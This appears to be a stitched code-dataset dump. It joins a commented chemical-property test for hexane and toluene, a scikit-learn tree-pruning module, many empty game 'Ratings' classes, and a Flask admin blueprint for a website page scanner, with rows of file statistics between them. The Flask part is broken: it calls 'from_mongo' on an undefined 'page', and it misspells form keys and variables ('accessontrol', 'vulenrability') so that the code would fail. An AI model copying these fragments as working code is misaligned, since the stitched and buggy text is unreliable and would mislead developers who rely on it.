# df_as_dict = {'Constant-pressure heat capacity, J/kg/K': {280.0: 2199.5376248501448, 350.0: 2509.3959378687496}, 'Viscosity, Pa*S': {280.0: 0.0003595695325135477, 350.0: 0.00018618849649397316}, 'Saturation pressure, Pa': {280.0: 8624.370564055087, 350.0: 129801.09838575375}, 'Joule-Thompson expansion coefficient, K/Pa': {280.0: 3.4834926941752087e-05, 350.0: 3.066272687922139e-05}, 'Surface tension, N/m': {280.0: 0.019794991465879444, 350.0: 0.01261221127458579}, 'Prandtl number': {280.0: 6.2861632870484234, 350.0: 4.5167171403747597}, 'Isobaric expansion, 1/K': {280.0: 0.001340989794772991, 350.0: 0.0016990766161286714}, 'Density, kg/m^3': {280.0: 671.28561912698535, 350.0: 606.36768482956563}, 'Thermal diffusivity, m^2/s': {280.0: 8.5209866345631262e-08, 350.0: 6.7981994628212491e-08}, 'Heat of vaporization, J/kg': {280.0: 377182.42886698805, 350.0: 328705.97080247721}, 'PermittivityLiquid': {280.0: 1.8865000000000001, 350.0: 1.802808}, 'Thermal consuctivity, W/m/K': {280.0: 0.12581389941664639, 350.0: 0.10344253187860687}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
#
#@pytest.mark.meta_Chemical
#def test_constants():
# # TODO: Hsub again so that works
# df = tabulate_constants('hexane')
# df_as_dict = {'Heat of vaporization at Tb, J/mol': {'hexane': 28862.311605415733}, 'Time-weighted average exposure limit': {'hexane': "(50.0, 'ppm')"}, 'Tc, K': {'hexane': 507.60000000000002}, 'Short-term exposure limit': {'hexane': 'None'}, 'Molecular Diameter, Angstrom': {'hexane': 5.6184099999999999}, 'Zc': {'hexane': 0.26376523052422041}, 'Tm, K': {'hexane': 178.07499999999999}, 'Heat of fusion, J/mol': {'hexane': 13080.0}, 'Tb, K': {'hexane': 341.87}, 'Stockmayer parameter, K': {'hexane': 434.75999999999999}, 'MW, g/mol': {'hexane': 86.175359999999998}, 'Refractive index': {'hexane': 1.3727}, 'rhoC, kg/m^3': {'hexane': 234.17217391304345}, 'Heat of formation, J/mol': {'hexane': -166950.0}, 'Pc, Pa': {'hexane': 3025000.0}, 'Lower flammability limit, fraction': {'hexane': 0.01}, 'logP': {'hexane': 4.0}, 'Upper flammability limit, fraction': {'hexane': 0.08900000000000001}, 'Dipole moment, debye': {'hexane': 0.0}, 'Triple temperature, K': {'hexane': 177.84}, 'Acentric factor': {'hexane': 0.29749999999999999}, 'Triple pressure, Pa': {'hexane': 1.1747772750450831}, 'Autoignition temperature, K': {'hexane': 498.14999999999998}, 'Vc, m^3/mol': {'hexane': 0.000368}, 'CAS': {'hexane': '110-54-3'}, 'Formula': {'hexane': 'C6H14'}, 'Flash temperature, K': {'hexane': 251.15000000000001}, 'Heat of sublimation, J/mol': {'hexane': None}}
#
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
#
# df = tabulate_constants(['hexane', 'toluene'], full=True, vertical=True)
# df_as_dict = {'hexane': {'Electrical conductivity, S/m': 1e-16, 'Global warming potential': None, 'InChI key': 'VLKZOEOYAKHREP-UHFFFAOYSA-N', 'Heat of vaporization at Tb, J/mol': 28862.311605415733, 'Time-weighted average exposure limit': "(50.0, 'ppm')", 'Tc, K': 507.6, 'Short-term exposure limit': 'None', 'Molecular Diameter, Angstrom': 5.61841, 'Formula': 'C6H14', 'InChI': 'C6H14/c1-3-5-6-4-2/h3-6H2,1-2H3', 'Parachor': 272.1972168105559, 'Heat of fusion, J/mol': 13080.0, 'Tb, K': 341.87, 'Stockmayer parameter, K': 434.76, 'IUPAC name': 'hexane', 'Refractive index': 1.3727, 'Tm, K': 178.075, 'solubility parameter, Pa^0.5': 14848.17694628013, 'Heat of formation, J/mol': -166950.0, 'Pc, Pa': 3025000.0, 'Lower flammability limit, fraction': 0.01, 'Vc, m^3/mol': 0.000368, 'Upper flammability limit, fraction': 0.08900000000000001, 'Dipole moment, debye': 0.0, 'MW, g/mol': 86.17536, 'Acentric factor': 0.2975, 'rhoC, kg/m^3': 234.17217391304345, 'Zc': 0.2637652305242204, 'Triple pressure, Pa': 1.1747772750450831, 'Autoignition temperature, K': 498.15, 'CAS': '110-54-3', 'smiles': 'CCCCCC', 'Flash temperature, K': 251.15, 'Ozone depletion potential': None, 'logP': 4.0, 'Heat of sublimation, J/mol': None, 'Triple temperature, K': 177.84}, 'toluene': {'Electrical conductivity, S/m': 1e-12, 'Global warming potential': None, 'InChI key': 'YXFVVABEGXRONW-UHFFFAOYSA-N', 'Heat of vaporization at Tb, J/mol': 33233.94544167449, 'Time-weighted average exposure limit': "(20.0, 'ppm')", 'Tc, K': 591.75, 'Short-term exposure limit': 'None', 'Molecular Diameter, Angstrom': 5.4545, 'Formula': 'C7H8', 'InChI': 'C7H8/c1-7-5-3-2-4-6-7/h2-6H,1H3', 'Parachor': 246.76008384965857, 'Heat of fusion, J/mol': 6639.9999999999991, 'Tb, K': 383.75, 'Stockmayer parameter, K': 350.74, 'IUPAC name': 'methylbenzene', 'Refractive index': 1.4941, 'Tm, K': 179.2, 'solubility parameter, Pa^0.5': 18242.232319337778, 'Heat of formation, J/mol': 50170.0, 'Pc, Pa': 4108000.0, 'Lower flammability limit, fraction': 0.01, 'Vc, m^3/mol': 0.00031600000000000004, 'Upper flammability limit, fraction': 0.078, 'Dipole moment, debye': 0.33, 'MW, g/mol': 92.13842, 'Acentric factor': 0.257, 'rhoC, kg/m^3': 291.5772784810126, 'Zc': 0.26384277925843774, 'Triple pressure, Pa': 0.04217711401906639, 'Autoignition temperature, K': 803.15, 'CAS': '108-88-3', 'smiles': 'CC1=CC=CC=C1', 'Flash temperature, K': 277.15, 'Ozone depletion potential': None, 'logP': 2.73, 'Heat of sublimation, J/mol': None, 'Triple temperature, K': 179.2}}
# pd.util.testing.assert_frame_equal(pd.DataFrame(df_as_dict), pd.DataFrame(df.to_dict()))
| 142.704918 | 2,516 | 0.727283 | 1,236 | 8,705 | 5.080906 | 0.342233 | 0.01242 | 0.012739 | 0.015127 | 0.325 | 0.219745 | 0.179777 | 0.146178 | 0.146178 | 0.10414 | 0 | 0.27827 | 0.104997 | 8,705 | 60 | 2,517 | 145.083333 | 0.527788 | 0.979437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016667 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4d13393d79948ef488c59d260466dfce8132cd54 | 8,855 | py | Python | imodels/tree/cart_ccp.py | stjordanis/imodels | 3c31df3f3d600d3b9c07fabdffd375b93e139c50 | [
"MIT"
] | 102 | 2019-07-16T13:45:35.000Z | 2020-09-14T19:12:49.000Z | imodels/tree/cart_ccp.py | stjordanis/imodels | 3c31df3f3d600d3b9c07fabdffd375b93e139c50 | [
"MIT"
] | 2 | 2020-01-03T20:47:14.000Z | 2020-01-03T21:17:39.000Z | imodels/tree/cart_ccp.py | stjordanis/imodels | 3c31df3f3d600d3b9c07fabdffd375b93e139c50 | [
"MIT"
] | 8 | 2019-08-09T08:40:34.000Z | 2020-09-06T17:51:10.000Z | from copy import deepcopy
from typing import List
import numpy as np
from sklearn import datasets
from sklearn.base import BaseEstimator
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.tree import DecisionTreeClassifier
from imodels.tree.hierarchical_shrinkage import HSTreeRegressor, HSTreeClassifier
from imodels.util.tree import compute_tree_complexity
class DecisionTreeCCPClassifier(DecisionTreeClassifier):
def __init__(self, estimator_: BaseEstimator, desired_complexity: int = 1, complexity_measure='max_rules', *args,
**kwargs):
self.desired_complexity = desired_complexity
# print('est', estimator_)
self.estimator_ = estimator_
self.complexity_measure = complexity_measure
def _get_alpha(self, X, y, sample_weight=None, *args, **kwargs):
path = self.estimator_.cost_complexity_pruning_path(X, y)
ccp_alphas, impurities = path.ccp_alphas, path.impurities
complexities = {}
low = 0
high = len(ccp_alphas) - 1
cur = 0
while low <= high:
cur = (high + low) // 2
est_params = self.estimator_.get_params()
est_params['ccp_alpha'] = ccp_alphas[cur]
copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
copied_estimator.fit(X, y)
if self._get_complexity(copied_estimator, self.complexity_measure) < self.desired_complexity:
high = cur - 1
elif self._get_complexity(copied_estimator, self.complexity_measure) > self.desired_complexity:
low = cur + 1
else:
break
self.alpha = ccp_alphas[cur]
# for alpha in ccp_alphas:
# est_params = self.estimator_.get_params()
# est_params['ccp_alpha'] = alpha
# copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
# copied_estimator.fit(X, y)
# complexities[alpha] = self._get_complexity(copied_estimator,self.complexity_measure)
# closest_alpha, closest_leaves = min(complexities.items(), key=lambda x: abs(self.desired_complexity - x[1]))
# self.alpha = closest_alpha
def fit(self, X, y, sample_weight=None, *args, **kwargs):
params_for_fitting = self.estimator_.get_params()
self._get_alpha(X, y, sample_weight, *args, **kwargs)
params_for_fitting['ccp_alpha'] = self.alpha
self.estimator_.set_params(**params_for_fitting)
self.estimator_.fit(X, y, *args, **kwargs)
def _get_complexity(self, BaseEstimator, complexity_measure):
return compute_tree_complexity(BaseEstimator.tree_, complexity_measure)
def predict_proba(self, *args, **kwargs):
if hasattr(self.estimator_, 'predict_proba'):
return self.estimator_.predict_proba(*args, **kwargs)
else:
return NotImplemented
def predict(self, X, *args, **kwargs):
return self.estimator_.predict(X, *args, **kwargs)
def score(self, *args, **kwargs):
if hasattr(self.estimator_, 'score'):
return self.estimator_.score(*args, **kwargs)
else:
return NotImplemented
class DecisionTreeCCPRegressor(BaseEstimator):
def __init__(self, estimator_: BaseEstimator, desired_complexity: int = 1, complexity_measure='max_rules', *args,
**kwargs):
self.desired_complexity = desired_complexity
# print('est', estimator_)
self.estimator_ = estimator_
self.alpha = 0.0
self.complexity_measure = complexity_measure
def _get_alpha(self, X, y, sample_weight=None):
path = self.estimator_.cost_complexity_pruning_path(X, y)
ccp_alphas, impurities = path.ccp_alphas, path.impurities
complexities = {}
low = 0
high = len(ccp_alphas) - 1
cur = 0
while low <= high:
cur = (high + low) // 2
est_params = self.estimator_.get_params()
est_params['ccp_alpha'] = ccp_alphas[cur]
copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
copied_estimator.fit(X, y)
if self._get_complexity(copied_estimator, self.complexity_measure) < self.desired_complexity:
high = cur - 1
elif self._get_complexity(copied_estimator, self.complexity_measure) > self.desired_complexity:
low = cur + 1
else:
break
self.alpha = ccp_alphas[cur]
# path = self.estimator_.cost_complexity_pruning_path(X,y)
# ccp_alphas, impurities = path.ccp_alphas, path.impurities
# complexities = {}
# for alpha in ccp_alphas:
# est_params = self.estimator_.get_params()
# est_params['ccp_alpha'] = alpha
# copied_estimator = deepcopy(self.estimator_).set_params(**est_params)
# copied_estimator.fit(X, y)
# complexities[alpha] = self._get_complexity(copied_estimator,self.complexity_measure)
# closest_alpha, closest_leaves = min(complexities.items(), key=lambda x: abs(self.desired_complexity - x[1]))
# self.alpha = closest_alpha
def fit(self, X, y, sample_weight=None):
params_for_fitting = self.estimator_.get_params()
self._get_alpha(X, y, sample_weight)
params_for_fitting['ccp_alpha'] = self.alpha
self.estimator_.set_params(**params_for_fitting)
self.estimator_.fit(X, y)
def _get_complexity(self, BaseEstimator, complexity_measure):
return compute_tree_complexity(BaseEstimator.tree_, self.complexity_measure)
def predict(self, X, *args, **kwargs):
return self.estimator_.predict(X, *args, **kwargs)
def score(self, *args, **kwargs):
if hasattr(self.estimator_, 'score'):
return self.estimator_.score(*args, **kwargs)
else:
return NotImplemented
class HSDecisionTreeCCPRegressorCV(HSTreeRegressor):
def __init__(self, estimator_: BaseEstimator, reg_param_list: List[float] = [0.1, 1, 10, 50, 100, 500],
desired_complexity: int = 1, cv: int = 3, scoring=None, *args, **kwargs):
super().__init__(estimator_=estimator_, reg_param=None)
self.reg_param_list = np.array(reg_param_list)
self.cv = cv
self.scoring = scoring
self.desired_complexity = desired_complexity
def fit(self, X, y, sample_weight=None, *args, **kwargs):
m = DecisionTreeCCPRegressor(self.estimator_, desired_complexity=self.desired_complexity)
m.fit(X, y, sample_weight, *args, **kwargs)
self.scores_ = []
for reg_param in self.reg_param_list:
est = HSTreeRegressor(deepcopy(m.estimator_), reg_param)
cv_scores = cross_val_score(est, X, y, cv=self.cv, scoring=self.scoring)
self.scores_.append(np.mean(cv_scores))
self.reg_param = self.reg_param_list[np.argmax(self.scores_)]
super().fit(X=X, y=y)
class HSDecisionTreeCCPClassifierCV(HSTreeClassifier):
def __init__(self, estimator_: BaseEstimator, reg_param_list: List[float] = [0.1, 1, 10, 50, 100, 500],
desired_complexity: int = 1, cv: int = 3, scoring=None, *args, **kwargs):
super().__init__(estimator_=estimator_, reg_param=None)
self.reg_param_list = np.array(reg_param_list)
self.cv = cv
self.scoring = scoring
self.desired_complexity = desired_complexity
def fit(self, X, y, sample_weight=None, *args, **kwargs):
m = DecisionTreeCCPClassifier(self.estimator_, desired_complexity=self.desired_complexity)
m.fit(X, y, sample_weight, *args, **kwargs)
self.scores_ = []
for reg_param in self.reg_param_list:
est = HSTreeClassifier(deepcopy(m.estimator_), reg_param)
cv_scores = cross_val_score(est, X, y, cv=self.cv, scoring=self.scoring)
self.scores_.append(np.mean(cv_scores))
self.reg_param = self.reg_param_list[np.argmax(self.scores_)]
super().fit(X=X, y=y)
if __name__ == '__main__':
m = DecisionTreeCCPClassifier(estimator_=DecisionTreeClassifier(random_state=1), desired_complexity=10,
complexity_measure='max_leaf_nodes')
# X,y = make_friedman1() #For regression
X, y = datasets.load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.33, random_state=42)
m.fit(X_train, y_train)
m.predict(X_test)
print(m.score(X_test, y_test))
m = HSDecisionTreeCCPClassifierCV(estimator_=DecisionTreeClassifier(random_state=1), desired_complexity=10,
reg_param_list=[0.0, 0.1, 1.0, 5.0, 10.0, 25.0, 50.0, 100.0])
m.fit(X_train, y_train)
print(m.score(X_test, y_test))
| 44.722222 | 118 | 0.65974 | 1,077 | 8,855 | 5.121634 | 0.119777 | 0.077774 | 0.045685 | 0.025381 | 0.822335 | 0.816171 | 0.808557 | 0.794416 | 0.770123 | 0.770123 | 0 | 0.011928 | 0.233089 | 8,855 | 197 | 119 | 44.949239 | 0.800324 | 0.124449 | 0 | 0.732877 | 0 | 0 | 0.012809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116438 | false | 0 | 0.061644 | 0.027397 | 0.273973 | 0.013699 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4d22a901abdddbb7dd9e7d2feddb7d3e95c4d549 | 7,097 | py | Python | loldib/getratings/models/NA/na_blitzcrank/na_blitzcrank_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_blitzcrank/na_blitzcrank_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_blitzcrank/na_blitzcrank_top.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Blitzcrank_Top_Aatrox(Ratings):
pass
class NA_Blitzcrank_Top_Ahri(Ratings):
pass
class NA_Blitzcrank_Top_Akali(Ratings):
pass
class NA_Blitzcrank_Top_Alistar(Ratings):
pass
class NA_Blitzcrank_Top_Amumu(Ratings):
pass
class NA_Blitzcrank_Top_Anivia(Ratings):
pass
class NA_Blitzcrank_Top_Annie(Ratings):
pass
class NA_Blitzcrank_Top_Ashe(Ratings):
pass
class NA_Blitzcrank_Top_AurelionSol(Ratings):
pass
class NA_Blitzcrank_Top_Azir(Ratings):
pass
class NA_Blitzcrank_Top_Bard(Ratings):
pass
class NA_Blitzcrank_Top_Blitzcrank(Ratings):
pass
class NA_Blitzcrank_Top_Brand(Ratings):
pass
class NA_Blitzcrank_Top_Braum(Ratings):
pass
class NA_Blitzcrank_Top_Caitlyn(Ratings):
pass
class NA_Blitzcrank_Top_Camille(Ratings):
pass
class NA_Blitzcrank_Top_Cassiopeia(Ratings):
pass
class NA_Blitzcrank_Top_Chogath(Ratings):
pass
class NA_Blitzcrank_Top_Corki(Ratings):
pass
class NA_Blitzcrank_Top_Darius(Ratings):
pass
class NA_Blitzcrank_Top_Diana(Ratings):
pass
class NA_Blitzcrank_Top_Draven(Ratings):
pass
class NA_Blitzcrank_Top_DrMundo(Ratings):
pass
class NA_Blitzcrank_Top_Ekko(Ratings):
pass
class NA_Blitzcrank_Top_Elise(Ratings):
pass
class NA_Blitzcrank_Top_Evelynn(Ratings):
pass
class NA_Blitzcrank_Top_Ezreal(Ratings):
pass
class NA_Blitzcrank_Top_Fiddlesticks(Ratings):
pass
class NA_Blitzcrank_Top_Fiora(Ratings):
pass
class NA_Blitzcrank_Top_Fizz(Ratings):
pass
class NA_Blitzcrank_Top_Galio(Ratings):
pass
class NA_Blitzcrank_Top_Gangplank(Ratings):
pass
class NA_Blitzcrank_Top_Garen(Ratings):
pass
class NA_Blitzcrank_Top_Gnar(Ratings):
pass
class NA_Blitzcrank_Top_Gragas(Ratings):
pass
class NA_Blitzcrank_Top_Graves(Ratings):
pass
class NA_Blitzcrank_Top_Hecarim(Ratings):
pass
class NA_Blitzcrank_Top_Heimerdinger(Ratings):
pass
class NA_Blitzcrank_Top_Illaoi(Ratings):
pass
class NA_Blitzcrank_Top_Irelia(Ratings):
pass
class NA_Blitzcrank_Top_Ivern(Ratings):
pass
class NA_Blitzcrank_Top_Janna(Ratings):
pass
class NA_Blitzcrank_Top_JarvanIV(Ratings):
pass
class NA_Blitzcrank_Top_Jax(Ratings):
pass
class NA_Blitzcrank_Top_Jayce(Ratings):
pass
class NA_Blitzcrank_Top_Jhin(Ratings):
pass
class NA_Blitzcrank_Top_Jinx(Ratings):
pass
class NA_Blitzcrank_Top_Kalista(Ratings):
pass
class NA_Blitzcrank_Top_Karma(Ratings):
pass
class NA_Blitzcrank_Top_Karthus(Ratings):
pass
class NA_Blitzcrank_Top_Kassadin(Ratings):
pass
class NA_Blitzcrank_Top_Katarina(Ratings):
pass
class NA_Blitzcrank_Top_Kayle(Ratings):
pass
class NA_Blitzcrank_Top_Kayn(Ratings):
pass
class NA_Blitzcrank_Top_Kennen(Ratings):
pass
class NA_Blitzcrank_Top_Khazix(Ratings):
pass
class NA_Blitzcrank_Top_Kindred(Ratings):
pass
class NA_Blitzcrank_Top_Kled(Ratings):
pass
class NA_Blitzcrank_Top_KogMaw(Ratings):
pass
class NA_Blitzcrank_Top_Leblanc(Ratings):
pass
class NA_Blitzcrank_Top_LeeSin(Ratings):
pass
class NA_Blitzcrank_Top_Leona(Ratings):
pass
class NA_Blitzcrank_Top_Lissandra(Ratings):
pass
class NA_Blitzcrank_Top_Lucian(Ratings):
pass
class NA_Blitzcrank_Top_Lulu(Ratings):
pass
class NA_Blitzcrank_Top_Lux(Ratings):
pass
class NA_Blitzcrank_Top_Malphite(Ratings):
pass
class NA_Blitzcrank_Top_Malzahar(Ratings):
pass
class NA_Blitzcrank_Top_Maokai(Ratings):
pass
class NA_Blitzcrank_Top_MasterYi(Ratings):
pass
class NA_Blitzcrank_Top_MissFortune(Ratings):
pass
class NA_Blitzcrank_Top_MonkeyKing(Ratings):
pass
class NA_Blitzcrank_Top_Mordekaiser(Ratings):
pass
class NA_Blitzcrank_Top_Morgana(Ratings):
pass
class NA_Blitzcrank_Top_Nami(Ratings):
pass
class NA_Blitzcrank_Top_Nasus(Ratings):
pass
class NA_Blitzcrank_Top_Nautilus(Ratings):
pass
class NA_Blitzcrank_Top_Nidalee(Ratings):
pass
class NA_Blitzcrank_Top_Nocturne(Ratings):
pass
class NA_Blitzcrank_Top_Nunu(Ratings):
pass
class NA_Blitzcrank_Top_Olaf(Ratings):
pass
class NA_Blitzcrank_Top_Orianna(Ratings):
pass
class NA_Blitzcrank_Top_Ornn(Ratings):
pass
class NA_Blitzcrank_Top_Pantheon(Ratings):
pass
class NA_Blitzcrank_Top_Poppy(Ratings):
pass
class NA_Blitzcrank_Top_Quinn(Ratings):
pass
class NA_Blitzcrank_Top_Rakan(Ratings):
pass
class NA_Blitzcrank_Top_Rammus(Ratings):
pass
class NA_Blitzcrank_Top_RekSai(Ratings):
pass
class NA_Blitzcrank_Top_Renekton(Ratings):
pass
class NA_Blitzcrank_Top_Rengar(Ratings):
pass
class NA_Blitzcrank_Top_Riven(Ratings):
pass
class NA_Blitzcrank_Top_Rumble(Ratings):
pass
class NA_Blitzcrank_Top_Ryze(Ratings):
pass
class NA_Blitzcrank_Top_Sejuani(Ratings):
pass
class NA_Blitzcrank_Top_Shaco(Ratings):
pass
class NA_Blitzcrank_Top_Shen(Ratings):
pass
class NA_Blitzcrank_Top_Shyvana(Ratings):
pass
class NA_Blitzcrank_Top_Singed(Ratings):
pass
class NA_Blitzcrank_Top_Sion(Ratings):
pass
class NA_Blitzcrank_Top_Sivir(Ratings):
pass
class NA_Blitzcrank_Top_Skarner(Ratings):
pass
class NA_Blitzcrank_Top_Sona(Ratings):
pass
class NA_Blitzcrank_Top_Soraka(Ratings):
pass
class NA_Blitzcrank_Top_Swain(Ratings):
pass
class NA_Blitzcrank_Top_Syndra(Ratings):
pass
class NA_Blitzcrank_Top_TahmKench(Ratings):
pass
class NA_Blitzcrank_Top_Taliyah(Ratings):
pass
class NA_Blitzcrank_Top_Talon(Ratings):
pass
class NA_Blitzcrank_Top_Taric(Ratings):
pass
class NA_Blitzcrank_Top_Teemo(Ratings):
pass
class NA_Blitzcrank_Top_Thresh(Ratings):
pass
class NA_Blitzcrank_Top_Tristana(Ratings):
pass
class NA_Blitzcrank_Top_Trundle(Ratings):
pass
class NA_Blitzcrank_Top_Tryndamere(Ratings):
pass
class NA_Blitzcrank_Top_TwistedFate(Ratings):
pass
class NA_Blitzcrank_Top_Twitch(Ratings):
pass
class NA_Blitzcrank_Top_Udyr(Ratings):
pass
class NA_Blitzcrank_Top_Urgot(Ratings):
pass
class NA_Blitzcrank_Top_Varus(Ratings):
pass
class NA_Blitzcrank_Top_Vayne(Ratings):
pass
class NA_Blitzcrank_Top_Veigar(Ratings):
pass
class NA_Blitzcrank_Top_Velkoz(Ratings):
pass
class NA_Blitzcrank_Top_Vi(Ratings):
pass
class NA_Blitzcrank_Top_Viktor(Ratings):
pass
class NA_Blitzcrank_Top_Vladimir(Ratings):
pass
class NA_Blitzcrank_Top_Volibear(Ratings):
pass
class NA_Blitzcrank_Top_Warwick(Ratings):
pass
class NA_Blitzcrank_Top_Xayah(Ratings):
pass
class NA_Blitzcrank_Top_Xerath(Ratings):
pass
class NA_Blitzcrank_Top_XinZhao(Ratings):
pass
class NA_Blitzcrank_Top_Yasuo(Ratings):
pass
class NA_Blitzcrank_Top_Yorick(Ratings):
pass
class NA_Blitzcrank_Top_Zac(Ratings):
pass
class NA_Blitzcrank_Top_Zed(Ratings):
pass
class NA_Blitzcrank_Top_Ziggs(Ratings):
pass
class NA_Blitzcrank_Top_Zilean(Ratings):
pass
class NA_Blitzcrank_Top_Zyra(Ratings):
pass
| 17.019185 | 47 | 0.784839 | 972 | 7,097 | 5.304527 | 0.151235 | 0.187355 | 0.455004 | 0.535299 | 0.823701 | 0.823701 | 0 | 0 | 0 | 0 | 0 | 0 | 0.156545 | 7,097 | 416 | 48 | 17.060096 | 0.861343 | 0 | 0 | 0.498195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.498195 | 0.00361 | 0 | 0.501805 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
4d43336ee7cab9b19622b60106476aad83791c83 | 87 | py | Python | src/satyrus/assets/__init__.py | pedromxavier/Satyrus3 | ed74a3c5e7271a1cb6414e524c209f26cb822ae8 | [
"MIT"
] | 1 | 2021-09-03T13:54:20.000Z | 2021-09-03T13:54:20.000Z | src/satyrus/assets/__init__.py | pedromxavier/Satyrus3 | ed74a3c5e7271a1cb6414e524c209f26cb822ae8 | [
"MIT"
] | null | null | null | src/satyrus/assets/__init__.py | pedromxavier/Satyrus3 | ed74a3c5e7271a1cb6414e524c209f26cb822ae8 | [
"MIT"
] | 2 | 2020-09-17T22:40:48.000Z | 2021-09-09T12:58:16.000Z | from .banner import __doc__ as SAT_BANNER
from .critical import __doc__ as SAT_CRITICAL | 43.5 | 45 | 0.850575 | 14 | 87 | 4.571429 | 0.5 | 0.28125 | 0.34375 | 0.4375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126437 | 87 | 2 | 45 | 43.5 | 0.842105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4d4d170518026d6e25b0797af589e70d2385a42c | 8,509 | py | Python | restflaskpyexample/models/pages/pageviewback.py | armoredware/restflask | 3e4c8e38c95a1783981774994d4e3d9d84fc70b0 | [
"MIT"
] | null | null | null | restflaskpyexample/models/pages/pageviewback.py | armoredware/restflask | 3e4c8e38c95a1783981774994d4e3d9d84fc70b0 | [
"MIT"
] | null | null | null | restflaskpyexample/models/pages/pageviewback.py | armoredware/restflask | 3e4c8e38c95a1783981774994d4e3d9d84fc70b0 | [
"MIT"
] | null | null | null |
@page_blueprint.route('/admin/page_search')
@user_decorators.requires_login #mike added
def admin_search():
return render_template('/pages/admin_search.html')
@page_blueprint.route('/page_search_results', methods=['POST'])
def search_results():
search_phrase = request.form['search_phrase']
search_type = request.form['search_type']
search_vintage= request.form['search_vintage']
search_bottle= request.form['search_bottle']
search_country= request.form['search_country']
search_case= request.form['search_case']
page = page.from_mongo(search_phrase, search_type, search_vintage, search_bottle, search_country, search_case)
return render_template('/pages/search_results.html', search_phrase= search_phrase, page= page)
@page_blueprint.route('/admin/page_search_results', methods=['POST'])
@user_decorators.requires_login #mike added
def admin_search_results():
search_phrase = request.form['search_phrase']
search_type = request.form['search_type']
search_vintage= request.form['search_vintage']
search_bottle= request.form['search_bottle']
search_country= request.form['search_country']
search_case= request.form['search_case']
page = page.from_mongo(search_phrase, search_type, search_vintage, search_bottle, search_country, search_case)
return render_template('/pages/admin_search_results.html', search_phrase= search_phrase, page= page)
@page_blueprint.route('/admin/new_page', methods=['POST', 'GET'])
@user_decorators.requires_login #mike added
def create_new_page():
if request.method == 'GET':
return render_template('/pages/new_page.html')
else:
domain= request.form['domain']
user_id= request.form['user_id']
last_mod= request.form['last_mod']
timestamp= request.form['timestamp']
page= request.form['user_id']
url= request.form['url']
xss= request.form['xss']
sqli= request.form['sqli']
sql= request.form['sql']
csrf= request.form['csrf']
hash= request.form['hash']
uptime= request.form['uptime']
loadspeed= request.form['loadspeed']
pagecontent= request.form['pagecontent']
externallinks= request.form['externallinks']
scripts= request.form['scripts']
base64= request.form['base64']
documenttype= request.form['documents']
virus= request.form['virus']
malware= request.form['malware']
reputation= request.form['reputation']
popups= request.form['popups']
bruteforce= request.form['bruteforce']
title= request.form['title']
redirect= request.form['redirect']
sensitivedata= request.form['sensitivedata']
emailaddresses= request.form['emailaddresses']
adaissues= request.form['adaissues']
accesscontrol= request.form['accessontrol']
vulenrability= request.form['vulnerability']
scanned= request.form['scanned']
new_page = Page(domain, user_id, last_mod, timestamp,
url,
xss,
sqli,
sql,
csrf,
hash,
uptime,
loadspeed,
pagecontent,
externallinks,
scripts,
base64,
documenttype,
virus,
malware,
reputation,
popups,
bruteforce,
title,
redirect,
sensitivedata,
emailaddresses,
adaissues,
accesscontrol,
vulnerability,
scanned)
new_page.save_to_mongo()
#return make_response("Thanks", 200)
#return render_template('search.html')
return render_template('/pages/added_page.html')
@page_blueprint.route('/admin/edit_page/<string:page_id>', methods=['POST', 'GET'])
@user_decorators.requires_login #mike added
def edit_page(page_id):
page = Page.from_mongo_id(page_id)
if request.method == 'GET':
return render_template('/pages/edit_page.html', page_id=page_id, page= page)
else:
domain= request.form['domain']
user_id= request.form['user_id']
last_mod= request.form['last_mod']
timestamp= request.form['timestamp']
url= request.form['url']
xss= request.form['xss']
sqli= request.form['sqli']
sql= request.form['sql']
csrf= request.form['csrf']
hash= request.form['hash']
uptime= request.form['uptime']
loadspeed= request.form['loadspeed']
pagecontent= request.form['pagecontent']
externallinks= request.form['externallinks']
scripts= request.form['scripts']
base64= request.form['base64']
documenttype= request.form['documents']
virus= request.form['virus']
